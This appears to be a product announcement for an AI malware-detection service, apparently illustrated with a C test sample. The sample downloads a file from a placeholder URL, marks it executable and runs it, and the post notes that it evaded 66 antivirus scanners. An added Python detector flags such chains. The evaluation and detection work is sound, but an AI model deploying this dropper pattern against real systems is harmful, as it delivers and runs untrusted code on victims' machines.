Introducing Deep Application Profiling

One-Shot Zero-Day AI-Powered malware detection.

We have developed a new approach to malware analysis and detection that addresses the limitations of traditional methods and offers a pathway towards zero-day malware detection. To understand the significance of this shift, let's look at the industry's current state. Traditional signature-based techniques rely on matching executables to known malware or detecting patterns from past behavior. Machine learning has enhanced detection by learning from previous cases. However, these methods are increasingly bypassed by attackers using custom, previously unseen code that spawns new malware variants. Detecting zero-day malware remains a major challenge.

How DAP works

“Intention is all you need”

Our approach focuses on identifying zero-day threats by analyzing their intent using neural networks. We are moving away from the traditional reliance on past malware appearances and historical patterns and shifting our focus to understanding the intent behind executable files. Instead of relying on known signatures or machine learning models trained on past data, we focus on understanding the core purpose of the executable and determining whether it poses a malicious risk. We strongly believe that this is the pathway towards zero-day malware discovery.

Effectiveness of DAP Against Zero-Day Malware

To evaluate DAP's performance in detecting Zero-Day malware, we conducted a comprehensive experiment comparing it against 66 existing malware solutions. We developed a simple executable designed to mimic suspicious behavior: it downloads another executable from the internet and executes it. This sequence of actions is atypical for legitimate applications and should be reliably flagged as malicious or at least suspicious by security solutions. The intent was to create a realistic Zero-Day threat that had not been previously identified or cataloged.

A snippet of the code can be seen below:

#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Test sample used in the experiment: fetch a file with libcurl, mark it
 * executable and replace the current process with it. */
void download_and_execute(const char* url, const char* filename) {
    CURL *curl;
    FILE *fp;
    CURLcode res;

    curl = curl_easy_init();
    if(curl) {
        fp = fopen(filename, "wb");
        if(fp) {
            curl_easy_setopt(curl, CURLOPT_URL, url);
            /* With no CURLOPT_WRITEFUNCTION set, libcurl fwrite()s the body to fp. */
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);
            res = curl_easy_perform(curl);
            if(res == CURLE_OK) {
                printf("File downloaded successfully: %s\n", filename);
                fclose(fp);
                curl_easy_cleanup(curl);
                if (chmod(filename, 0755) == 0) {
                    /* execve() only returns on failure. */
                    execve(filename, (char *const[]){filename, NULL}, NULL);
                    perror("execve");
                } else {
                    perror("chmod");
                }
            } else {
                fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
                fclose(fp);
                curl_easy_cleanup(curl);   /* release the handle on the failure path too */
            }
        } else {
            perror("fopen");
            curl_easy_cleanup(curl);
        }
    }
}

int main() {
    const char* url = "https://example.com/malicious_script.sh";
    const char* filename = "/tmp/downloaded_file";
    curl_global_init(CURL_GLOBAL_DEFAULT);   /* required once per process before easy handles */
    download_and_execute(url, filename);
    curl_global_cleanup();
    return 0;
}

We compiled the aforementioned code into an executable file and submitted it to VirusTotal, where none of the 66 scanners flagged it as malicious, despite the clearly suspicious behavior of downloading and executing a file. The code evaded detection simply because it was custom written and does not match the patterns that antivirus tools search for.

Virus Total Scan Results

In contrast, our Deep Application Profiler, without any prior exposure to the executable or its code, analyzed the executable, detected the threat, and provided evidence backing its risk score in the form of pseudocode, as demonstrated in the video below.
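To make the intent argument concrete, here is an added example (not DAP's code and not from the original post) of the simplest form of intent-based triage: instead of matching bytes, it maps a binary's imported functions to coarse capabilities and escalates only when a chain such as download, write, chmod, execute is present, reporting the chain as pseudocode evidence. The capability table, the weights and the `nm -D` excerpts are constructed for this example; a real pipeline would feed it the actual `nm -D` output or a proper ELF import parser.

```python
import re
# Coarse capability groups keyed by imported function name; the grouping is
# this example's own assumption, not DAP's model.
CAPABILITIES = {
    "network_fetch": {"curl_easy_perform", "recv", "connect", "getaddrinfo"},
    "file_write": {"fopen", "fwrite", "open", "write"},
    "make_executable": {"chmod", "fchmod"},
    "execute": {"execve", "execv", "execvp", "system", "posix_spawn"},
}
# Intent rules: (required capabilities, risk score, pseudocode reported as evidence).
INTENT_RULES = [
    ({"network_fetch", "file_write", "make_executable", "execute"}, 90,
     "f = download(url); write(f); chmod(f, +x); exec(f)"),
    ({"network_fetch", "file_write", "execute"}, 70,
     "f = download(url); write(f); exec(f)"),
    ({"file_write", "make_executable", "execute"}, 50,
     "write(f); chmod(f, +x); exec(f)"),
]
# An undefined ("U") symbol line from `nm -D`, e.g. "   U execve@GLIBC_2.2.5".
NM_UNDEFINED = re.compile(r"^\s*(?:[0-9a-fA-F]+\s+)?U\s+(\w+)(?:@\S*)?\s*$")

def imported_symbols(nm_output):
    """Return the set of undefined symbol names from nm -D style output."""
    names = set()
    for line in nm_output.splitlines():
        m = NM_UNDEFINED.match(line)
        if m:
            names.add(m.group(1))
    return names

def assess(nm_output):
    """Score a binary by the capability chains its imports can realise."""
    syms = imported_symbols(nm_output)
    caps = {cap for cap, fns in CAPABILITIES.items() if syms & fns}
    score, evidence = 0, []
    for required, weight, pseudocode in INTENT_RULES:
        if required <= caps:  # every capability in the chain is present
            score = max(score, weight)
            evidence.append(pseudocode)
    return {"score": score, "capabilities": sorted(caps), "evidence": evidence}

# Constructed `nm -D` excerpts: the post's download-and-execute sample, and a
# download-only tool that shares most imports but never executes anything.
DROPPER_NM = """                 U chmod@GLIBC_2.2.5
                 U curl_easy_perform@LIBCURL_4
                 U execve@GLIBC_2.2.5
                 U fopen@GLIBC_2.2.5"""
FETCHER_NM = """                 U curl_easy_perform@LIBCURL_4
                 U fopen@GLIBC_2.2.5"""
```

The point of the two samples is that no single import is suspicious; the download-only tool scores 0 while the post's sample scores 90 because the whole chain is present.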

Who DAP Is For

DAP will be available in two offerings to cater to different user needs: a web service and an API.

Web Service: Designed for professional malware analysts, the web service offers an intuitive platform to analyze executable files. Analysts can leverage DAP’s advanced tools to dissect and understand malware behavior efficiently, enhancing their ability to identify and mitigate threats.

API: Tailored for organizations such as antivirus companies, government agencies, and other enterprises, the API allows seamless integration of DAP’s technology into existing systems. By incorporating our API, these organizations can enhance their malware detection capabilities, providing more robust and proactive security measures.

Whether you are an individual analyst seeking powerful analysis tools or an organization aiming to bolster your cyber-security infrastructure, DAP provides the solutions you need to stay ahead of evolving threats.

Limitations

One limitation we are currently facing is processing time. Due to the rigorous analysis involved, certain types of executable files may take several minutes to process. We are actively optimizing our processes to reduce these times without compromising detection accuracy, ensuring faster and more efficient malware analysis.

DAP has now been deemed awardable in the DARPA ERIS Market Place. Government customers, please check out our 7-minute solution video on ERIS: www.darpaconnect.us/eris.